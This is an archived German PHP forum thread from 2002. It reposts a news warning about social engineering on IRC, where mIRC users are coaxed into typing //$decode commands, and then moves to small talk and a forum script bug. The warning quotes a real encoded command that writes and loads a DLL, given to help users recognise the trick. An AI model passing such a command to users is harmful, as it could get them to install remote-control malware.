Warnung: file_put_contents(/home/www/web1/html/php_dev/test.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/www/web1/html/php_dev/sys/lib.activity.php (Zeile 58)
IRC: Vorsicht vor //$decode [Archiv] - PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr

- Ad -
php-resource



PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen :
IRC: Vorsicht vor //$decode

 
Berni
12-01-2002, 10:53 
 
Seit einiger Zeit versuchen einige User per "Social Engineering", Anwender des Chatclients mIRC zu verleiten, ungewollte Kommandos auszuführen -- mittlerweile existieren offenbar auch Trojanische Pferde.

Server-Administratoren des EFnet warnen inziwschen vor Nachrichten (/msg), die Chatter dazu auffordern, eine //$decode-Anweisung wie beispielsweise " //$decode(d3JpdGUgZ29kLmRsbCAkcmVhZCgkc2NyaXB0LG4sMSk=,m) | //$decode(LmxvYWQgLXJzIGdvZC5kbGw=,m)}" einzugeben. Es handelt sich dabei um uuencode, eine Methode, um Binär-Daten in ASCII umzuwandeln. Die Skriptsprache von mIRC ist äußerst leistungsfähig, über solche //$decode-Anweisungen können DLLs eingebunden und Programme gestartet werden -- der Angreifer kann so den Rechner von außen kontrollieren.

Die Administratoren weisen darauf hin, dass es sich um keine Sicherheitslücke in mIRC handelt, sondern vielmehr um unvorsichtige Anwender, die sich das Ei selbst ins Nest legen. Grundsätzlich sollten im IRC keine Befehle ausgeführt werden, die einem von anderen Chattern "aufgeschwatzt" werden. Die Server-Administratoren bieten ein Web-Interface zur Übersetzung der //$decode-Anweisungen. (pab/c't)

http://www.heise.de/newsticker/data/pab-11.01.02-001/
 
Berni
12-01-2002, 10:54 
 
wie schön waren die Zeiten im IRC. Nächtelang mit Leuten aus aller Welt "geplaudert"....

*achjaaaaa* :)
 
Morpheus
15-01-2002, 22:07 
 
mmh ?

naja, ich glaube das ist heute immernoch so ! und wer solche Befehle eingibt der ist wirklich selber schuld ! nun IRC ist eigentlich zur Zeit mein Hauptkommunikationsmittel und treffe dort eigentlich sehr Viele Leute von den PHP-Codern bist zu pakistanischen Webdesignern, dort ist eigentlich alles vertretten, und mit Xchat macht das sogar nochn tick mehr Spass =)

Irgendetwas stimmt mit dem Backend Script des Forums nicht...

[Editiert von Morpheus am 15-01-2002 um 22:11]
 
Berni
16-01-2002, 14:03 
 
IRC ist immer noch das ding schlecht hin. leider habe ich nur noch wening zeit mich im IRC zu unterhalten. :(

Original geschrieben von Morpheus
...
Irgendetwas stimmt mit dem Backend Script des Forums nicht...


was ist den das Backend Script und was stimmt nicht?

Gruss
berni
 
Morpheus
16-01-2002, 15:48 
 
das ist doch das script mit dem ihr die Foren threads auf der Mainpage projektiert, ich bekomme dort nur noch Javascript fehler ! unter win und auch unter Linux
 
Berni
16-01-2002, 15:51 
 
mit welchem Browser?
ich habe hier IE 6.0 und kann keine Fehler sehen/finden

cu
berni
 
Morpheus
16-01-2002, 16:20 
 
Win

IE6
Opera 5

Linux Konqueror


überall das selbe Problem ich schicke euch gerne n Screenshot, es läuft wirklich nicht
 
Berni
16-01-2002, 16:43 
 
oh ja,
mach mal bitte

danke
berni

Alle Zeitangaben in WEZ +2. Es ist jetzt 15:29 Uhr.